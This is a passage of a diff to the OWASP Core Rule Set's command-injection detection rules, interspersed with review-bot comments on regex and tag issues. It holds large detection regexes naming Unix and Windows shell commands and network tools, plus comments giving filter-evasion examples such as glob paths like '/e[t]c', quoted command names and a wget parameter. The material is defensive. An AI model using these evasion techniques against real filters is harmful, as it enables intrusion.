(?:[\s,;]|\.|/|<|>).*)|t[\"\^]*(?:a[\"\^]*(?:s[\"\^]*k[\"\^]*(?:k[\"\^]*i[\"\^]*l[\"\^]*l|l[\"\^]*i[\"\^]*s[\"\^]*t|s[\"\^]*c[\"\^]*h[\"\^]*d|m[\"\^]*g[\"\^]*r)|k[\"\^]*e[\"\^]*o[\"\^]*w[\"\^]*n)|(?:i[\"\^]*m[\"\^]*e[\"\^]*o[\"\^]*u|p[\"\^]*m[\"\^]*i[\"\^]*n[\"\^]*i|e[\"\^]*l[\"\^]*n[\"\^]*e|l[\"\^]*i[\"\^]*s)[\"\^]*t|s[\"\^]*(?:d[\"\^]*i[\"\^]*s[\"\^]*c[\"\^]*o|s[\"\^]*h[\"\^]*u[\"\^]*t[\"\^]*d)[\"\^]*n|y[\"\^]*p[\"\^]*e[\"\^]*(?:p[\"\^]*e[\"\^]*r[\"\^]*f|(?:[\s,;]|\.|/|<|>).*)|r[\"\^]*(?:a[\"\^]*c[\"\^]*e[\"\^]*r[\"\^]*t|e[\"\^]*e))|w[\"\^]*(?:i[\"\^]*n[\"\^]*(?:d[\"\^]*i[\"\^]*f[\"\^]*f|m[\"\^]*s[\"\^]*d[\"\^]*p|v[\"\^]*a[\"\^]*r|r[\"\^]*[ms])|u[\"\^]*(?:a[\"\^]*(?:u[\"\^]*c[\"\^]*l[\"\^]*t|p[\"\^]*p)|s[\"\^]*a)|s[\"\^]*c[\"\^]*(?:r[\"\^]*i[\"\^]*p[\"\^]*t|u[\"\^]*i)|e[\"\^]*v[\"\^]*t[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*l|m[\"\^]*i[\"\^]*(?:m[\"\^]*g[\"\^]*m[\"\^]*t|c)|a[\"\^]*i[\"\^]*t[\"\^]*f[\"\^]*o[\"\^]*r|h[\"\^]*o[\"\^]*a[\"\^]*m[\"\^]*i|g[\"\^]*e[\"\^]*t)|u[\"\^]*(?:s[\"\^]*(?:e[\"\^]*r[\"\^]*a[\"\^]*c[\"\^]*c[\"\^]*o[\"\^]*u[\"\^]*n[\"\^]*t[\"\^]*c[\"\^]*o[\"\^]*n[\"\^]*t[\"\^]*r[\"\^]*o[\"\^]*l[\"\^]*s[\"\^]*e[\"\^]*t[\"\^]*t[\"\^]*i[\"\^]*n[\"\^]*g[\"\^]*s|r[\"\^]*s[\"\^]*t[\"\^]*a[\"\^]*t)|n[\"\^]*(?:r[\"\^]*a[\"\^]*r|z[\"\^]*i[\"\^]*p))|q[\"\^]*(?:u[\"\^]*e[\"\^]*r[\"\^]*y[\"\^]*(?:[\s,;]|\.|/|<|>).*|p[\"\^]*r[\"\^]*o[\"\^]*c[\"\^]*e[\"\^]*s[\"\^]*s|w[\"\^]*i[\"\^]*n[\"\^]*s[\"\^]*t[\"\^]*a|g[\"\^]*r[\"\^]*e[\"\^]*p)|o[\"\^]*(?:d[\"\^]*b[\"\^]*c[\"\^]*(?:a[\"\^]*d[\"\^]*3[\"\^]*2|c[\"\^]*o[\"\^]*n[\"\^]*f)|p[\"\^]*e[\"\^]*n[\"\^]*f[\"\^]*i[\"\^]*l[\"\^]*e[\"\^]*s)|v[\"\^]*(?:o[\"\^]*l[\"\^]*(?:[\s,;]|\.|/|<|>).*|e[\"\^]*r[\"\^]*i[\"\^]*f[\"\^]*y)|x[\"\^]*c[\"\^]*(?:a[\"\^]*c[\"\^]*l[\"\^]*s|o[\"\^]*p[\"\^]*y)|z[\"\^]*i[\"\^]*p[\"\^]*(?:[\s,;]|\.|/|<|>).*)(?:\.[\"\^]*\w+)?\b" \ - "id:932115,\ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pmFromFile windows-powershell-commands.data" \ + "id:932120,\ 
 phase:2,\
 block,\
 capture,\
- t:none,\
- msg:'Remote Command Execution: Windows Command Injection',\
+ t:none,t:cmdLine,\
+ msg:'Remote Command Execution: Windows PowerShell Command Found',\
 logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
 tag:'application-multi',\
 tag:'language-shell',\
+ tag:'language-powershell',\
 tag:'platform-windows',\
 tag:'attack-rce',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/88',\
 tag:'PCI/6.5.2',\
- ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.3.0',\
+ ver:'OWASP_CRS/4.0.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
- setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
-# [ Windows PowerShell, cmdlets and options ]
-#
-# Detect some common PowerShell commands, cmdlets and options.
-# These commands should be relatively uncommon in normal text, but
-# potentially useful for code injection.
+# [ Windows Powershell cmdlet aliases ]
 #
+# Attempts to detect aliases of the common PowerShell cmdlets in windows-powershell-commands.data
 # If you are not running Windows, it is safe to disable this rule.
 #
-# https://technet.microsoft.com/en-us/magazine/ff714569.aspx
-# https://msdn.microsoft.com/en-us/powershell/scripting/core-powershell/console/powershell.exe-command-line-help
+# There are other aliases which are similar to Unix, but they are properly handled by rule 932105
 #
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pmFromFile windows-powershell-commands.data" \
- "id:932120,\
+# Regular expression generated from regex-assembly/932125.ra.
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932125 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:[\n\r;`\{]|\|\|?|&&?)[\s\v]*[\s\v\"'-\(,@]*(?:[\"'\.-9A-Z_a-z]+/|(?:[\"'\x5c\^]*[0-9A-Z_a-z][\"'\x5c\^]*:.*|[ \"'\.-9A-Z\x5c\^-_a-z]*)\x5c)?[\"\^]*(?:(?:a[\"\^]*(?:c|s[\"\^]*n[\"\^]*p)|e[\"\^]*(?:b[\"\^]*p|p[\"\^]*(?:a[\"\^]*l|c[\"\^]*s[\"\^]*v|s[\"\^]*n)|[tx][\"\^]*s[\"\^]*n)|f[\"\^]*(?:[cltw]|o[\"\^]*r[\"\^]*e[\"\^]*a[\"\^]*c[\"\^]*h)|i[\"\^]*(?:[cr][\"\^]*m|e[\"\^]*x|h[\"\^]*y|i|p[\"\^]*(?:a[\"\^]*l|c[\"\^]*s[\"\^]*v|m[\"\^]*o|s[\"\^]*n)|s[\"\^]*e|w[\"\^]*(?:m[\"\^]*i|r))|m[\"\^]*(?:a[\"\^]*n|[dipv]|o[\"\^]*u[\"\^]*n[\"\^]*t)|o[\"\^]*g[\"\^]*v|p[\"\^]*(?:o[\"\^]*p|u[\"\^]*s[\"\^]*h)[\"\^]*d|t[\"\^]*r[\"\^]*c[\"\^]*m|w[\"\^]*j[\"\^]*b)[\"\^]*[\s\v,\.-/;-<>].*|c[\"\^]*(?:(?:(?:d|h[\"\^]*d[\"\^]*i[\"\^]*r|v[\"\^]*p[\"\^]*a)[\"\^]*|p[\"\^]*(?:[ip][\"\^]*)?)[\s\v,\.-/;-<>].*|l[\"\^]*(?:(?:[cipv]|h[\"\^]*y)[\"\^]*[\s\v,\.-/;-<>].*|s)|n[\"\^]*s[\"\^]*n)|d[\"\^]*(?:(?:b[\"\^]*p|e[\"\^]*l|i[\"\^]*(?:f[\"\^]*f|r))[\"\^]*[\s\v,\.-/;-<>].*|n[\"\^]*s[\"\^]*n)|g[\"\^]*(?:(?:(?:(?:a[\"\^]*)?l|b[\"\^]*p|d[\"\^]*r|h[\"\^]*y|(?:w[\"\^]*m[\"\^]*)?i|j[\"\^]*b|[u-v])[\"\^]*|c[\"\^]*(?:[ims][\"\^]*)?|m[\"\^]*(?:o[\"\^]*)?|s[\"\^]*(?:n[\"\^]*(?:p[\"\^]*)?|v[\"\^]*))[\s\v,\.-/;-<>].*|e[\"\^]*r[\"\^]*r|p[\"\^]*(?:(?:s[\"\^]*)?[\s\v,\.-/;-<>].*|v))|l[\"\^]*s|n[\"\^]*(?:(?:a[\"\^]*l|d[\"\^]*r|[iv]|m[\"\^]*o|s[\"\^]*n)[\"\^]*[\s\v,\.-/;-<>].*|p[\"\^]*s[\"\^]*s[\"\^]*c)|r[\"\^]*(?:(?:(?:(?:b[\"\^]*)?p|e[\"\^]*n|(?:w[\"\^]*m[\"\^]*)?i|j[\"\^]*b|n[\"\^]*[ip])[\"\^]*|d[\"\^]*(?:r[\"\^]*)?|m[\"\^]*(?:(?:d[\"\^]*i[\"\^]*r|o)[\"\^]*)?|s[\"\^]*n[\"\^]*(?:p[\"\^]*)?|v[\"\^]*(?:p[\"\^]*a[\"\^]*)?)[\s\v,\.-/;-<>].*|c[\"\^]*(?:j[\"\^]*b[\"\^]*[\s\v,\.-/;-<>].*|s[\"\^]*n)|u[\"\^]*j[\"\^]*b)|s[\"\^]*(?:(?:(?:a[\"
\^]*(?:j[\"\^]*b|l|p[\"\^]*s|s[\"\^]*v)|b[\"\^]*p|[civ]|w[\"\^]*m[\"\^]*i)[\"\^]*|l[\"\^]*(?:s[\"\^]*)?|p[\"\^]*(?:(?:j[\"\^]*b|p[\"\^]*s|s[\"\^]*v)[\"\^]*)?)[\s\v,\.-/;-<>].*|h[\"\^]*c[\"\^]*m|u[\"\^]*j[\"\^]*b))(?:\.[\"\^]*[0-9A-Z_a-z]+)?\b" \
+ "id:932125,\
 phase:2,\
 block,\
 capture,\
- t:none,t:urlDecodeUni,t:cmdLine,t:lowercase,\
- msg:'Remote Command Execution: Windows PowerShell Command Found',\
+ t:none,\
+ msg:'Remote Command Execution: Windows Powershell Alias Command Injection',\
 logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
 tag:'application-multi',\
 tag:'language-shell',\
- tag:'language-powershell',\
 tag:'platform-windows',\
 tag:'attack-rce',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/88',\
 tag:'PCI/6.5.2',\
- ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.3.0',\
+ ver:'OWASP_CRS/4.0.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
- setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 # [ Unix shell expressions ]
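Review bot: The new 932125 comment `# There are other aliases which are similar to Unix, but they are properly handled by rule 932105` points at a rule id this commit appears to retire — the hunk earlier in this file removes `- "id:932105,\` and adds `+ "id:932235,\` in its place — so unless 932105 survives elsewhere the reference should name the rule that now covers Unix-like command words (932235, or 932230 as the 932250 comment further down does). The new 932125 rule also lacks `tag:'language-powershell',\`, which this same hunk adds to 932120, even though 932125 is a PowerShell alias rule; adding that tag after `tag:'language-shell',\` keeps the two rules consistent for anyone filtering alerts by tag. Minor: the 932125 msg says `Windows Powershell` while 932120's msg and the section headings spell it `PowerShell`.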
@@ -339,16 +277,23 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 # <(foo) Process substitution
 # >(foo) Process substitution
 # $((foo)) Arithmetic expansion
+# /e[t]c Shell glob expression to bypass wordlists
 #
-# Regexp generated from util/regexp-assemble/regexp-932130.data using Regexp::Assemble.
-# See https://coreruleset.org/20190826/optimizing-regular-expressions/ for usage.
+# This rule has a stricter sibling: 932131 (PL2) that applies the same regex to User-Agent and Referer
 #
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:\$(?:\((?:\(.*\)|.*)\)|\{.*\})|[<>]\(.*\))" \
+# This rule is essential to defend against the Log4J / Log4Shell attacks (see also rule 944150)
+#
+# Regular expression generated from regex-assembly/932130.ra.
+# To update the regular expression run the following shell script
+# (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
+# crs-toolchain regex update 932130
+#
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \$(?:\((?:.*|\(.*\))\)|\{.*\})|[<>]\(.*\)|/[0-9A-Z_a-z]*\[!?.+\]" \
 "id:932130,\
 phase:2,\
 block,\
 capture,\
- t:none,t:urlDecodeUni,t:cmdLine,\
+ t:none,t:cmdLine,\
 msg:'Remote Command Execution: Unix Shell Expression Found',\
 logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
 tag:'application-multi',\
@@ -359,11 +304,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/88',\
 tag:'PCI/6.5.2',\
- ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.3.0',\
+ ver:'OWASP_CRS/4.0.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
- setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 # [ Windows FOR, IF commands ]
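Review bot: In the new 932130 regex the alternation `\$(?:\((?:.*|\(.*\))\)` carries a dead branch — `.*` already matches anything `\(.*\)` can, so the second alternative can never decide a match and only adds backtracking work; since the comment says the regex is generated from regex-assembly/932130.ra, the simplification belongs in the `.ra` source (the same pattern, `\$(?:.*|.*)`, is visible inside the 932235 regex earlier in this file and presumably comes from the same source). The new glob branch `/[0-9A-Z_a-z]*\[!?.+\]` matches any `/word[...]` with at least one character between the brackets, which is wider than the `/e[t]c` example the comment gives and may fire on bracketed path segments in benign input; one comment line such as `# Glob branch matches /<word>[<anything>], not only single-character classes; expect FPs on bracketed path segments` would record the trade-off for the next tuner.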
@@ -386,15 +330,17 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 # http://ss64.com/nt/if.html
 # http://ss64.com/nt/for.html
 #
-# Regexp generated from util/regexp-assemble/regexp-932140.data using Regexp::Assemble.
-# See https://coreruleset.org/20190826/optimizing-regular-expressions/ for usage.
+# Regular expression generated from regex-assembly/932140.ra.
+# To update the regular expression run the following shell script
+# (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
+# crs-toolchain regex update 932140
 #
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \b(?:if(?:/i)?(?: not)?(?: exist\b| defined\b| errorlevel\b| cmdextversion\b|(?: |\().*(?:\bgeq\b|\bequ\b|\bneq\b|\bleq\b|\bgtr\b|\blss\b|==))|for(?:/[dflr].*)? %+[^ ]+ in\(.*\)\s?do)" \
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \b(?:for(?:/[dflr].*)? %+[^ ]+ in\(.*\)[\s\v]?do|if(?:/i)?(?: not)?(?: (?:e(?:xist|rrorlevel)|defined|cmdextversion)\b|[ \(].*(?:\b(?:g(?:eq|tr)|equ|neq|l(?:eq|ss))\b|==)))" \
 "id:932140,\
 phase:2,\
 block,\
 capture,\
- t:none,t:urlDecodeUni,t:cmdLine,\
+ t:none,t:cmdLine,\
 msg:'Remote Command Execution: Windows FOR/IF Command Found',\
 logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
 tag:'application-multi',\
@@ -405,11 +351,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/88',\
 tag:'PCI/6.5.2',\
- ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.3.0',\
+ ver:'OWASP_CRS/4.0.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
- setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 # [ Unix direct remote command execution ]
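Review bot: The rewritten 932140 regex has no `(?i)` and expects `in\(` with no space before the parenthesis, so whether it matches real `for %i in (...) do` / `IF EXIST` input depends entirely on `t:cmdLine` (which lowercases the payload and strips spaces before `(`); that dependency is invisible in the comment block and deserves a line, e.g. `# No (?i) and in\( without a space: the rule relies on t:cmdLine lowercasing the payload and removing spaces before '('.` The whitespace before `do` was widened from `\s?` to `[\s\v]?` while the other separators in the same regex (` %+`, ` in\(`, ` not`, the leading ` ` of `[ \(]`) and the class `[^ ]+` still accept only a plain space; if t:cmdLine does not normalise other whitespace to a space, the two halves of the regex now treat whitespace inconsistently — confirm against the transformation's behaviour and either widen them as well or note in the comment why only the `do` separator needed it.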
@@ -417,36 +362,163 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
# Detects Unix commands at the start of a parameter (direct RCE).
# Example: foo=wget%20www.example.com
#
-# This case is different from command injection (rule 932100), where a
+# In this rule we use a different check from command injection (rule 932230), where a
# command string is appended (injected) to a regular parameter, and then
# passed to a shell unescaped.
#
+# Additionaly, we require a trailing space (denoting command parameters) or command
+# separator character after the command.
+#
# This rule is also triggered by an Oracle WebLogic Remote Command Execution exploit:
# [ Oracle WebLogic vulnerability CVE-2017-10271 - Exploit tested: https://www.exploit-db.com/exploits/43458 ]
#
-# Due to a higher risk of false positives, the following changes have been
-# made relative to rule 932100:
-# 1) the set of commands is smaller
-# 2) we require a trailing space (denoting command parameters) or command
-# separator character after the command
+# An effort was made to combat evasions by shell quoting (e.g. 'ls',
+# 'l'"s", \l\s are all valid). ModSecurity has a t:cmdLine
+# transformation built-in to deal with this, but unfortunately, it
+# replaces ';' characters and lowercases the payload, which is less
+# useful for this case. However, emulating the transformation makes
+# the regexp more complex.
+#
+# This is the base Rule to prevent Direct Unix Command Injection
+# without prefix match.
+#
+# Rule relations:
+#
+# .932230 (base rule, PL1, targets prefix + two and three character commands)
+# ..932231 (stricter sibling, PL2, targets prefix + the source shortcut command)
+# ..932232 (stricter sibling, PL3, targets prefix + additional command words)
+# .932235 (base rule, PL1, targets prefix + known command word of length > 3 without evasion)
+#
+# .932250 (base rule, PL1, targets two and three character commands)
+# .932260 (base rule, PL1, targets known command word of length > 3 without evasion)
+#
+# .932240 (generic detection, PL2, targets generic evasion attempts)
+# .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2,
+# - with and without prefix
+# - words of any length)
+# ..932239 (sibling of 932236, PL2,
+# - with and without prefix
+# - words of any length
+# - targets request headers user-agent and referer only
+# - excluded words: known user-agents)
+# ..932238 (stricter sibling of 932236, PL3,
+# - no excluded words)
+# .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3,
+# - targets request headers user-agent and referer only
+# - without prefix
+# - with word boundaries
+# - words of any length
+# - excluded words: known user-agents)
+#
+#
+# Regular expression generated from regex-assembly/932250.ra.
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932250 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:^|b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?y[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?x|c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?v|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?l)|[ls][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9
\?-@_a-\{]*)?\x5c?h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t)?|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|<(?:\(|<<)|>\(|\([\s\v]*\))[\s\v]*(?:[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[arx])?|(?:b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z|x)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z|[ckz][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h|d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?f|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?v|s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h)|f[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[dg]|g[
\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c|p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?g)|(?:h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u|u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?b|l[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:s|z(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?4)?)|p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|x[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z)|r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p)?|s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[